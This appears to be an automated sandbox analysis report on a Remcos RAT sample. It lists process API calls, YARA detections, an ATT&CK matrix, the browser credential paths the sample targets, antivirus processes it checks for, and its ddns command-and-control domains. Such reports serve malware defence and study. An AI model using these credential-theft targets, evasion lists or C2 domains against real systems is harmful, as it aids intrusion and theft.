Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	11_2_00007FF7823E51EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	11_2_00007FF7823E3140
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	11_2_00007FF7823D6EE4
Source: C:\Users\Public\alpha.pif	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	16_2_00858572
Source: C:\Users\Public\alpha.pif	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,	16_2_00856854
Source: C:\Users\Public\alpha.pif	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	16_2_00859310
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	19_2_0045201B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	19_2_004520B6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	19_2_00452143
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	19_2_00452393
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	19_2_00448484
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	19_2_004524BC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	19_2_004525C3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	19_2_00452690
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	19_2_0044896D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoA,	19_2_0040F90C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	19_2_00451D58
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	19_2_00451FD0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoA,	19_2_06F50643
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	19_2_06F92E7A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	19_2_06F92DED
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	19_2_06F92D52
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	19_2_06F92D07
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	19_2_06F92A8F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	19_2_06F896A4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	19_2_06F932FA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	19_2_06F933C7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,	19_2_06F930CA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	19_2_06F931F3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: EnumSystemLocalesW,	19_2_06F891BB

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\alpha.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\alpha.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\alpha.pif	Queries volume information: C:\ VolumeInformation

Source: C:\Users\Public\alpha.exe

Code function: 3_2_00007FF7823E9584 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,

3_2_00007FF7823E9584

Source: C:\Users\Public\kn.exe

Code function: 6_2_00007FF6A2A86CB4 ConvertStringSidToSidW,LookupAccountNameW,GetLastError,#359,LocalAlloc,#357,LocalAlloc,LookupAccountNameW,GetLastError,IsValidSid,LocalFree,LocalFree,

6_2_00007FF6A2A86CB4

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 19_2_0044942D _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

19_2_0044942D

Source: C:\Users\Public\alpha.exe

Code function: 3_2_00007FF7823D586C GetVersion,

3_2_00007FF7823D586C

Source: C:\Users\Public\Libraries\Puyiaiob.PIF

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: cmdagent.exe
Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: quhlpsvc.exe
Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgamsvr.exe
Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Vsserv.exe
Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgupsvc.exe
Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgemc.exe
Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 30.2.SndVol.exe.4a70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.colorcpl.exe.6f40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.SndVol.exe.4a71937.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.colorcpl.exe.6f40000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.colorcpl.exe.6f41937.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.SndVol.exe.4a71937.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.SndVol.exe.4a70000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.colorcpl.exe.6f41937.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001E.00000003.1964735207.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.1964815243.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1965400311.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.4142210416.0000000003060000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 7088, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 3848, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\ANYDESKS\logs.dat, type: DROPPED

Contains functionality to steal Chrome passwords or cookies

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

19_2_0040BA4D

Contains functionality to steal Firefox passwords or cookies

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		19_2_0040BB6B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: \key3.db		19_2_0040BB6B

Remote Access Functionality

Detected Remcos RAT

Source: C:\Windows\SysWOW64\colorcpl.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-B5YX7T			Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-B5YX7T

Yara detected Remcos RAT

Source: Yara match	File source: 30.2.SndVol.exe.4a70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.colorcpl.exe.6f40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.SndVol.exe.4a71937.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.colorcpl.exe.6f40000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.colorcpl.exe.6f41937.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.SndVol.exe.4a71937.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.SndVol.exe.4a70000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.colorcpl.exe.6f41937.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001E.00000003.1964735207.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.1964815243.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1965400311.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.4142210416.0000000003060000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 7088, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 3848, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\ANYDESKS\logs.dat, type: DROPPED

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: cmd.exe

19_2_0040569A

Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29E227C DsGetDcNameW,#357,DsBindW,DsCrackNamesW,#357,#357,#357,#357,#357,LocalAlloc,#359,DsUnBindW,NetApiBufferFree,DsFreeNameResultW,LocalFree,LocalFree,	6_2_00007FF6A29E227C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29FE568 #357,LookupAccountSidW,GetLastError,#357,DsGetDcNameW,DsBindW,DsGetDomainControllerInfoW,DsGetDomainControllerInfoW,#357,DsUnBindW,NetApiBufferFree,LocalFree,	6_2_00007FF6A29FE568
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29E54A0 wcschr,NetApiBufferFree,DsFreeNameResultW,#13,LocalFree,DsGetDcNameW,#359,#224,#224,DsBindW,#357,DsCrackNamesW,#357,#145,#359,#359,#14,#359,#73,#359,#208,#26,#127,LocalFree,#140,#359,#224,#167,#27,#357,#357,#41,NetApiBufferFree,DsUnBindW,DsFreeNameResultW,#13,LocalFree,	6_2_00007FF6A29E54A0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A2A05648 #357,#357,DsGetSiteNameW,#359,LocalAlloc,LocalAlloc,GetTickCount,DsGetSiteNameW,GetTickCount,#207,LocalFree,#359,NetApiBufferFree,#357,#357,#207,LocalFree,#359,#359,#359,LocalFree,NetApiBufferFree,NetApiBufferFree,LocalFree,LocalFree,#357,DsUnBindW,	6_2_00007FF6A2A05648

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	2 Valid Accounts	1 Native API	1 Scripting	1 DLL Side-Loading	2 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	12 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	1 DLL Side-Loading	1 Bypass User Account Control	1 Deobfuscate/Decode Files or Information	111 Input Capture	1 Account Discovery	Remote Desktop Protocol	111 Input Capture	21 Encrypted Channel	Exfiltration Over Bluetooth	1 System Shutdown/Reboot
Email Addresses	DNS Server	Domain Accounts	2 Service Execution	2 Valid Accounts	2 Valid Accounts	2 Obfuscated Files or Information	2 Credentials In Files	1 System Service Discovery	SMB/Windows Admin Shares	3 Clipboard Data	1 Remote Access Software	Automated Exfiltration	1 Defacement
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Windows Service	21 Access Token Manipulation	1 Install Root Certificate	NTDS	1 System Network Connections Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	1 Registry Run Keys / Startup Folder	1 Windows Service	1 Timestomp	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	213 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	422 Process Injection	1 DLL Side-Loading	Cached Domain Credentials	46 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Registry Run Keys / Startup Folder	1 Bypass User Account Control	DCSync	341 Security Software Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	12 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	221 Masquerading	/etc/passwd and /etc/shadow	3 Process Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	2 Valid Accounts	Network Sniffing	1 Application Window Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	12 Virtualization/Sandbox Evasion	Input Capture	1 System Owner/User Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	21 Access Token Manipulation	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	422 Process Injection	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
saw.bat	8%	ReversingLabs	Script-BAT.Trojan.Heuristic

Dropped Files

Source	Detection	Scanner	Label
C:\Users\Public\Libraries\AnyDesk.PIF	24%	ReversingLabs	Win32.Trojan.Generic
C:\Users\Public\Libraries\Puyiaiob.PIF	24%	ReversingLabs	Win32.Trojan.Generic
C:\Users\Public\alpha.exe	0%	ReversingLabs
C:\Users\Public\alpha.pif	0%	ReversingLabs
C:\Users\Public\kn.exe	0%	ReversingLabs
C:\Users\Public\xpha.pif	0%	ReversingLabs

Source	Detection	Scanner	Label
mysweeterbk.ddns.net	100%	Avira URL Cloud	malware
meetre1ms.freeddns.org	0%	Avira URL Cloud	safe
https://drive.usercontn	0%	Avira URL Cloud	safe
bbhmeetre1ms.freeddns.org	0%	Avira URL Cloud	safe
freshmysweeterbk.ddns.net	0%	Avira URL Cloud	safe
myumysmeetr.ddns.net	0%	Avira URL Cloud	safe
tre1ms.freeddns.org	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
drive.google.com	172.217.19.238	true	false	high
drive.usercontent.google.com	142.250.181.33	true	false	high
myumysmeetr.ddns.net	0.0.0.0	true	true	unknown
mysweeterbk.ddns.net	unknown	unknown	true	unknown
bbhmeetre1ms.freeddns.org	unknown	unknown	true	unknown
freshmeetre1ms.freeddns.org	unknown	unknown	true	unknown
freshmysweeterbk.ddns.net	unknown	unknown	true	unknown
meetre1ms.freeddns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
mysweeterbk.ddns.net	true	Avira URL Cloud: malware	unknown
tre1ms.freeddns.org	true	Avira URL Cloud: safe	unknown
myumysmeetr.ddns.net	true	Avira URL Cloud: safe	unknown
meetre1ms.freeddns.org	true	Avira URL Cloud: safe	unknown
bbhmeetre1ms.freeddns.org	true	Avira URL Cloud: safe	unknown
freshmysweeterbk.ddns.net	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0	AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp	false		high
https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP	kn.exe, 00000006.00000002.1681606213.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000000.1678229839.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1683346312.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1688987056.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr	false		high
https://login.microsoftonline.com/%s/oauth2/authorize	kn.exe	false		high
https://sectigo.com/CPS0	AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp	false		high
https://login.microsoftonline.com/%s/oauth2/token	kn.exe	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#	AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/	AnyDesk.PIF, 00000009.00000003.1823239665.0000000000675000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1845207168.0000000000696000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp	false		high
https://enterpriseregistration.windows.net/EnrollmentServer/key/	kn.exe	false		high
https://drive.usercontn	AnyDesk.PIF, 00000009.00000003.1823239665.000000000066B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1845207168.000000000066E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://geoplugin.net/json.gp	colorcpl.exe	false		high
https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah	kn.exe, 00000006.00000002.1681606213.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000000.1678229839.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1683346312.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1688987056.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr	false		high
http://geoplugin.net/json.gp/C	colorcpl.exe, 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp	false		high
https://drive.google.com/	AnyDesk.PIF, 00000009.00000002.1845207168.00000000005EE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc	kn.exe	false		high
http://www.pmail.com	AnyDesk.PIF, AnyDesk.PIF, 00000009.00000002.1903384135.000000007FE2F000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1698042458.000000000290C000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1698319869.000000007FB70000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1848830449.000000000290F000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1849834813.0000000002ACE000.00000004.00001000.00020000.00000000.sdmp, Puyiaiob.PIF, 0000001C.00000002.1967008119.0000000002AD2000.00000004.00001000.00020000.00000000.sdmp, Puyiaiob.PIF, 0000001F.00000002.2050844522.0000000002B42000.00000004.00001000.00020000.00000000.sdmp	false		high
https://%ws/%ws_%ws_%ws/service.svc/%ws	kn.exe	false		high
https://enterpriseregistration.windows.net/EnrollmentServer/device/	kn.exe	false		high
http://ocsp.sectigo.com0C	AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.217.19.238	drive.google.com	United States		15169	GOOGLEUS	false
142.250.181.33	drive.usercontent.google.com	United States		15169	GOOGLEUS	false

Private

IP
127.0.0.1

General Information

